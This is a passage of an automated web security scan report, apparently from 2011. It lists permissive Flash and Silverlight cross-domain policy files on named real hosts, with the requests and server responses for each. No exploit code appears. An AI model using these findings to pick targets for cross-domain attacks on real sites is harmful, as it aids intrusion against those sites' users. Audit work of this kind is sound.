The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn-cms.scout.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Location: http://cdn-cms.scout.com/crossdomain.xml
Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT
ETag: "01f3482dc3fcb1:853"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Server: Pike
Date: Tue, 19 Jul 2011 12:04:55 GMT
Content-Length: 222
Connection: close
Akamai: True

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />

...[SNIP]...

3.7. http://dev.virtualearth.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dev.virtualearth.net

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Thu, 30 Jun 2011 21:42:15 GMT
Accept-Ranges: bytes
ETag: "98928946e37cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:11:01 GMT
Connection: close
Content-Length: 277

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-r
...[SNIP]...

3.8. http://ecn.t0.tiles.virtualearth.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t0.tiles.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.t0.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "54b6e26d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 207
Age: 77449
Date: Tue, 19 Jul 2011 12:09:28 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

3.9. http://ecn.t1.tiles.virtualearth.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t1.tiles.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.t1.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "54b6e26d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 207
Age: 80652
Date: Tue, 19 Jul 2011 12:09:27 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

3.10. http://ecn.t2.tiles.virtualearth.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t2.tiles.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.t2.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "54b6e26d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 207
Age: 118093
Date: Tue, 19 Jul 2011 12:09:26 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

3.11. http://ecn.t3.tiles.virtualearth.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t3.tiles.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.t3.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "54b6e26d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 207
Age: 74673
Date: Tue, 19 Jul 2011 12:09:26 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

3.12. http://img1.catalog.video.msn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://img1.catalog.video.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img1.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Last-Modified: Thu, 24 Jun 2010 10:03:51 GMT
Accept-Ranges: bytes
ETag: "efb12b8c8413cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:10:34 GMT
Content-Length: 177
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>

3.13. http://img2.catalog.video.msn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://img2.catalog.video.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img2.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Last-Modified: Thu, 24 Jun 2010 10:03:51 GMT
Accept-Ranges: bytes
ETag: "efb12b8c8413cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:10:35 GMT
Content-Length: 177
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>

3.14. http://img3.catalog.video.msn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://img3.catalog.video.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img3.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "efb12b8c8413cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 177
Age: 329083
Date: Tue, 19 Jul 2011 12:10:34 GMT
Last-Modified: Thu, 24 Jun 2010 10:03:51 GMT
Expires: Fri, 29 Jul 2011 16:45:51 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>

3.15. http://img4.catalog.video.msn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://img4.catalog.video.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img4.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Last-Modified: Thu, 24 Jun 2010 10:03:51 GMT
Accept-Ranges: bytes
ETag: "efb12b8c8413cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:10:35 GMT
Content-Length: 177
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>

3.16. http://minerva.healthcentral.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://minerva.healthcentral.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: minerva.healthcentral.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:58:25 GMT
Server: Omniture DC/2.0.0
xserver: www192
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

3.17. http://sensor2.suitesmart.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://sensor2.suitesmart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sensor2.suitesmart.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:58:25 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 18 Feb 2011 18:15:01 GMT
ETag: "1f00e1-c9-49c927e105340"
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

3.18. http://static.suitesmart.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.suitesmart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.suitesmart.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 17 Feb 2011 00:10:45 GMT
ETag: "19e27-ca-49c6f3a952b40"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Date: Tue, 19 Jul 2011 01:58:24 GMT
Connection: close
Cache-Control: no-store

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

3.19. http://statse.webtrendslive.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: statse.webtrendslive.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:89c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 01:59:53 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

3.20. http://t0.tiles.virtualearth.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://t0.tiles.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: t0.tiles.virtualearth.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Accept-Ranges: bytes
ETag: "54b6e26d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:09:43 GMT
Connection: close
Content-Length: 207

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

3.21. http://www.scout.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scout.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 222
Content-Type: text/xml
Content-Location: http://www.scout.com/crossdomain.xml
Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT
Accept-Ranges: bytes
ETag: "01f3482dc3fcb1:ded"
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:04:45 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />

...[SNIP]...

3.22. http://feeds.bbci.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Tue, 19 Jul 2011 03:06:52 GMT
Date: Tue, 19 Jul 2011 03:04:52 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

3.23. http://googleads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Mon, 18 Jul 2011 22:46:41 GMT
Expires: Tue, 19 Jul 2011 22:46:41 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 11596
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

3.24. http://newsrss.bbc.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=116
Expires: Tue, 19 Jul 2011 03:06:47 GMT
Date: Tue, 19 Jul 2011 03:04:51 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

3.25. http://server.iad.liveperson.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: server.iad.liveperson.net

Response

HTTP/1.1 200 OK
Content-Length: 526
Content-Type: text/xml
Content-Location: http://server.iad.liveperson.net/crossdomain.xml
Last-Modified: Thu, 23 Oct 2008 22:13:48 GMT
Accept-Ranges: bytes
ETag: "076249f5c35c91:1199"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 02:00:08 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"
...[SNIP]...
<allow-access-from domain="*.neogames-tech.com" secure="false" />
...[SNIP]...
<allow-access-from domain="secure.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.qa.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.st.neogames-tech.com" secure="false"/>
...[SNIP]...

3.26. http://www.codero.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.codero.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.codero.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:59:56 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 PHP/5.2.10 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Fri, 04 Feb 2011 20:44:27 GMT
ETag: "43f417-cf-f2b360c0"
Accept-Ranges: bytes
Content-Length: 207
Cache-Control: max-age=0, proxy-revalidate
Expires: Tue, 19 Jul 2011 01:59:56 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.codero.com" />
<allow-access-from domain="*.ookla.com" />
<allow-access-from domain="*.speedtest.net" />
</cross-domain-p
...[SNIP]...

3.27. http://www.healthcentral.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.healthcentral.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.healthcentral.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CUR CONi OUR DELi SAMi OTRi STP STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Accept-Ranges: bytes
Last-Modified: Wed, 14 Oct 2009 16:46:43 GMT
ETag: "1CA4CEDE8CA1B80:1CC45558567C1E9"
Content-Type: text/xml
Content-Length: 362
Cache-Control: public, max-age=44354
Expires: Tue, 19 Jul 2011 14:18:09 GMT
Date: Tue, 19 Jul 2011 01:58:55 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.washingtonpost.com" />
<allow-access-from domain="*.choicemedia.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.healthcentral.com" secure="false" />
...[SNIP]...

3.28. http://api.twitter.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:01:12 GMT
Server: hi
Status: 200 OK
Last-Modified: Tue, 12 Jul 2011 21:05:19 GMT
Content-Type: application/xml
Content-Length: 561
Cache-Control: max-age=1800
Expires: Tue, 19 Jul 2011 02:31:12 GMT
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
...[SNIP]...
<allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

4. Silverlight cross-domain policy
There are 22 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain that publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged-in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://ad.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Tue, 20 May 2008 22:28:37 GMT
Date: Tue, 19 Jul 2011 01:58:24 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
